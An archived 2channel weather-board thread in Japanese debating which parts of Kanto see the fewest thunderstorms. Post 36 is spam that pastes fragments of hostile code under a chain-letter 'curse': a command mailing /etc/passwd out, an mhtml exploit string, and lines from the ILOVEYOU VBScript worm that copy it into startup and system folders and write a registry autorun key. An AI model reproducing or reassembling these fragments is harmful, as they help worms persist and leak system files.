2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

関東地方で一番雷の少ない所は?

1 :名無しSUN:2005/08/23(火) 21:22:33 ID:ygLIkpul
まあ日本全体で見れば北海道は最小らしいけど
関東限定だったらどこが少ないか語り合いましょう!

・関連

関東雷スレッド27
http://science3.2ch.net/test/read.cgi/sky/1124784545/

☆雷の嫌いな人の集い☆
http://science3.2ch.net/test/read.cgi/sky/1121753214/

2 :東京@港区:2005/08/23(火) 21:27:57 ID:8fc3ZBzB
千葉県館山市とか鴨川付近
一番群馬・栃木から遠いから


3 :名無しSUN:2005/08/23(火) 21:30:46 ID:gZ5XiEJl
東京山手線内
東京湾沿い
房総半島

4 :名無しSUN:2005/08/23(火) 21:50:27 ID:5Z4k/jtP
茨城の海沿いはどう?

5 :安中榛名:2005/08/23(火) 21:57:52 ID:QO/JW+ra
房総半島東京湾沿いかな?
群馬でも館林の方はそれほど多くは無いと思う。山沿いがメイン。

6 :名無しSUN:2005/08/23(火) 22:04:22 ID:G88ciiI2
最も落雷が少ないのは神奈川県鎌倉市とか
戸塚周辺は雷雲が避けるとか言われてるが、
近年そうでもなさそうだな・・

7 :名無しSUN:2005/08/23(火) 22:20:33 ID:8D2NrsKG
町田市も都心に比べると半分以下くらいしか
雷はないですよ

8 :名無しSUN :2005/08/23(火) 22:26:19 ID:iraK2ajG
関東平野の中央部。岩槻〜春日部〜野田辺りだと思う。

9 :名無しSUN:2005/08/23(火) 22:46:39 ID:qbK+X0A1
>8
アホ発見。人生やり直せ!

10 :名無しSUN:2005/08/23(火) 22:55:11 ID:Za+dMGcn
船橋市。
ショボン

11 :名無しSUN:2005/08/23(火) 23:01:17 ID:AoPW55pX
東京都新宿区
北西からと南西からの両方のルートからの雷雲がかかりにくい

12 :名無しSUN:2005/08/23(火) 23:30:28 ID:IcRFZyxc
千葉県船橋市だよきっと。いや、間違いない。

13 :名無しSUN:2005/08/23(火) 23:32:33 ID:ZkqR6gVC
船橋に一票。待っててもなかなかこない。
今日のような珍しく千葉に来た日でもゴロゴロぐらい。
海側じゃないと本当にこない

14 :名無しSUN::2005/08/23(火) 23:32:56 ID:rEmEJAsf
千葉県北西部では

15 :名無しSUN:2005/08/23(火) 23:42:44 ID:Za+dMGcn
ついでに台風も少ないし来てもたいした事無い>>船橋

16 :名無しSUN:2005/08/24(水) 00:18:28 ID:TAHtFwQ+
町田市在住です。
確かにあんまり雷は少ないかも。
ただ、ごくたまに町田市で雷雲が発生することがあるよ。 

17 :名無しSUN:2005/08/24(水) 00:28:25 ID:/aNR6Gay
混じれ酢すると湘南 三浦 内房

18 :名無しSUN::2005/08/24(水) 00:47:29 ID:yipb2n/7
三浦は確かに少ないね。千葉市周辺か三浦かもな

19 :名無しSUN:2005/08/24(水) 01:12:06 ID:w5fUrSeX
栃木、群馬あたりに転勤になったらマジで会社やめる

20 :名無しSUN :2005/08/24(水) 01:37:52 ID:leob5ANz
>>9
なんで?

21 :名無しSUN:2005/08/24(水) 01:53:45 ID:B/uTpf22
>>20
9ではないが、
埼玉自体雷が多いうえに
秩父方面から東に来る雷や、栃木方面から南下する
雷の通り道になることが多い

22 :名無しSUN :2005/08/24(水) 02:03:14 ID:leob5ANz
>>21
秩父→南下して都内へ。
群馬・栃木・熊谷→茨城方面へ。

ここ数年意外と埼玉北東部は避けてるんだなぁ。

23 :名無しSUN:2005/08/24(水) 02:14:56 ID:B/uTpf22
>>22
大宮・浦和・久喜あたりでピンポイントで発生するやつは
結構直撃する
少なくても千葉北西部より発雷しやすい


24 :名無しSUN:2005/08/24(水) 03:39:14 ID:+0wJk/Um
夕立的な雷なら、神奈川県の湘南・西湘・三浦半島と千葉県南部か?
ただ、これらの地域は、南岸を進む低気圧によって生じる雷は、
関東地方の他の地域よりも多い感じがする。

25 :名無しSUN:2005/08/24(水) 10:16:09 ID:IyKbhQoI
房総沿岸、東京湾岸、相模湾岸で少ない気がする。
関東北部で意外に少ないのは舘林、佐野あたり。
そして雷で有名な那須。標高が低い所では猛烈な雷雨も多いが、
標高が高くなるほど、激しい雷は少なくなる傾向にあるようだ。


26 :名無しSUN:2005/08/24(水) 10:29:53 ID:R2o9HM2k
>>19
今年はここ数年より多かっただけ。
まあ今年が今までで言う普通の年なんだけどね。
今時雷なんて怖くないよ。記憶にある15年くらいで、
自宅から半径500メートルで3件ほど落雷で火事になってるけど。
木や遊具も壊れてるけどさ

27 :千葉県流山市:2005/08/24(水) 10:37:32 ID:bxiA+rqX
ここじゃよ、ここ。
「雷警報」が出ても、ピカリともしないうちに解除になる。
昨日も、1滴も降らなかったよ。

28 :名無しSUN:2005/08/24(水) 11:17:10 ID:Ts0Mbd2Q
統計的にみても市川・船橋・鎌ケ谷・八千代
あたりが少ないことは間違いない!

29 :名無しSUN:2005/08/24(水) 11:22:41 ID:Ts0Mbd2Q
ついでに
>>19
IDはsex

30 :名無しSUN:2005/08/24(水) 11:44:14 ID:s3L953mp
大都市周辺はエーロゾルが多いから同じ条件なら
千葉の房総半島の南端とかが一番少ない気がする。
山も300m位しかないし。

31 :名無しSUN:2005/08/24(水) 12:10:16 ID:bnHgwPmz
レーダー見る限りでは、神奈川県相模原市・座間市とか少なそうだな。

32 :名無しSUN:2005/08/24(水) 12:55:46 ID:UvKSsaya
今年まだ1回しか雷雨がない伊勢原。
大山阿夫利神社、別名雨降神社があり、
関八州の雨乞いの霊場って言うくらい
昔から 雨乞いしてるからいつもスル-される

33 :名無しSUN:2005/08/24(水) 16:39:07 ID:zo8KZbyC
>>32
雨乞いしてるからいつもスル-される

ソレダ
船橋がスルーされるのは!

34 :名無しSUN:2005/09/07(水) 21:44:38 ID:armXxFMZ
房総や湘南ほどではないが、鹿嶋とかも少ない気がする。
実際どうなんだろうか。

35 :名無しSUN:2005/09/23(金) 02:09:14 ID:1PzHcI1J
東京区部に範囲を絞ると恐らく一番少ないのは江戸川区南部一帯。
23区中西部〜北部で発達する雷雲は葛飾あたりに流れることはあっても南下してくることは少ない。
南西部で発達する場合も多くは流れてくる前に衰える。
時として23区全域に大雨洪水警報が出ても降水0mmで取り残されりとか・・

どちらかというと都内というより千葉北西部の気候に近いんだと思われ。

36 :名無しSUN:2005/11/11(金) 16:50:16 ID:x7d7rFw4
cat /etc/passwd | mail nobody kak.hta';ken=wd+'START ms-its:mhtml:file://c:\

fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

これなんか反応するんですけど・・・
怖いので教えてください。チェーンメールですか?
これ見た人は100個以上のスレにコピペして貼らなきゃ
あなたと好きな人が呪われるって聞いたので
ごめんなさい・・・。ここに貼らせていただきます・・・
悪気はないんです。怖いんです・・・
このサイトで個人名晒されて悪口かかれて、それを原因に
自殺した事件があったらしいんですけど、その呪いと言われました。。
どうしてくれるんですか!
呪われたくないんです
怖いので言われたとおりにします・・・

37 :名無しSUN:2006/01/29(日) 23:11:42 ID:IELClX94
    /,,;,,,,,  ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;  ,,,,,,,,;:::::丶
   / :::::::::;;,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,;::::::::::::::::::ヽ
   i゙:::;:::::||::::::,!i:::::::::::,|i::::::::::::::::::;::::::::::::::::::::::::::::::゙i
  i゙::::|;;;;| |;;;;;| |::::::::::| |:::::::::::::::::||:::::::::::::::::::::::::::::::|
 . i゙::::::i     ''''''''''' '───' |;;;;;;;;;;;;:::::::::::::::::|
  .|:::::::|,                |:::::::::::::::::::|
  |;::::::::|,ーーーーヘ' ,ヘ─-─ーー|:::::::::::::::::::|
  `ヽ、i   _r':ィoン:::lヘl::::ィoン:/ :::  |;;;::::::::::::::/ 
  .   i  l、::::::::ノ| l`ー─'  ::::  /^゙-、;;;;/
     { `  ̄ ̄(   )ヽ   .::::   '-'~ノ
    λ  、_ ノ`-'''   _ノ  /-'^"
     ヽ,_、    __      (
     /`'' 、 -三='     /^l
    /  /( ノ `'''''''´~ _, - ' ~ ゙i、


38 :名無しSUN:2006/03/01(水) 02:08:06 ID:ngjTWukv
あげ

39 :千葉県北東部(銚子):2006/03/01(水) 13:32:29 ID:+M8qjzJ/
ここは他と比べて少ないとおもう、雷注意報はやたらと出るが実際には殆ど当たらない。

40 :名無しSUN:2006/04/25(火) 14:10:29 ID:B1sP71OC
あげ

41 :名無しSUN:2006/04/25(火) 14:36:32 ID:PgZ3zZ7X
銚子は北東気流の影響をまともに受けやすいのに
なんで夏の日照時間が関東一多いの?

42 :名無しSUN:2006/04/25(火) 14:53:07 ID:c0p4PvxC
銚子って周りに高い山がないから、ただ海風が吹き抜けていくだけで、
北東風でも晴れ間が出やすいのでは?

逆に北東気流で雲が出やすいのは関東南西部ではないかと。
山越えで晴れるから、その分低い雲を受け止めやすいはず。
アメダス設置地点が少なすぎてデータとしては不十分だが。

43 :名無しSUN:2006/04/25(火) 22:16:46 ID:YN49Rf7j
まあ回数はわからないが、町田市〜相模原市あたりは良いぞ。
この真上でいきなり発生する事は少なくて、ほとんどどっかから進んでくるだけ。
だから避難しやすい。

44 :名無しSUN:2006/06/11(日) 11:03:47 ID:ROKpcvpg
携帯厨集合汁
http://jump.sagasu.in/goto/funny/



45 :名無しSUN:2006/06/23(金) 16:18:43 ID:ASsuXCb0
あげ

46 :名無しSUN:2006/07/15(土) 07:44:55 ID:mOf5oyWE
意外に東京の都心(特に城南)とか川崎あたりって
落雷が少ないんじゃないかな? 

47 :名無しSUN:2006/07/15(土) 11:52:57 ID:rWeOeKwm
雷が少ない関東地方なのに、なんで一番少ない地方を探すんだ?このスレ。あ、申し遅れました、私、富山県砺波市在住で金沢に勤めてるものです。

48 :名無しSUN:2006/07/15(土) 12:55:54 ID:CuXzZvvf
神奈川県央〜県西の秦野ですが
レーダー見てると、わりかし少ないほうと思います。
箱根と丹沢のおかげなのかな。
もっと少ないところはあるかもしれません。

49 :名無しSUN:2006/07/15(土) 13:04:59 ID:YD4ERZKL
>>47
北陸を出されたら太刀打ちできません。ここは関東ですので、そっとしておいてください。
不思議なのは、何で冬型の低い雲で発雷出来るのかだな

50 :名無しSUN:2006/07/15(土) 13:27:00 ID:Nfsn+pNk
>>48
でも今年は昨日と6月7日はそちらへ流れてますね。
寧ろ湘南から三浦半島にかけてが少ない気がします。

51 ::2006/07/15(土) 20:58:36 ID:nPvIaAoD
何か前テレビで栃木は雷発生件数世界一って聞いた

52 :名無しSUN:2006/07/15(土) 21:57:51 ID:YD4ERZKL
>>51 結果
http://www.rikuden.co.jp/kaminari/tokucho.html

53 :名無しSUN:2006/07/15(土) 22:39:42 ID:Bd/Iu2jv
>>46
都心といっても地域内格差結構あるよ。
この地域をさらに細かく見ると概ね北西部>南東部の図式。
この辺は>>35がいいとこ突いてると思う。

54 :名無しSUN:2006/07/15(土) 23:36:42 ID:VDrJq5Xl
一番落雷が少ないのは鎌倉や戸塚と言われている。
戸塚は湘南や三浦半島より内陸だが、雷雲の通り道になりにくいらしい。

>>48
夏場は入道雲を見かけやすいし、時としてピンポイント爆撃もあるがな。
でも横浜線沿いよりは少ないかも。

55 :59x87x243x134.ap59.ftth.ucom.ne.jp:2006/12/11(月) 15:17:26 ID:qjp+CTot
大島

12 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)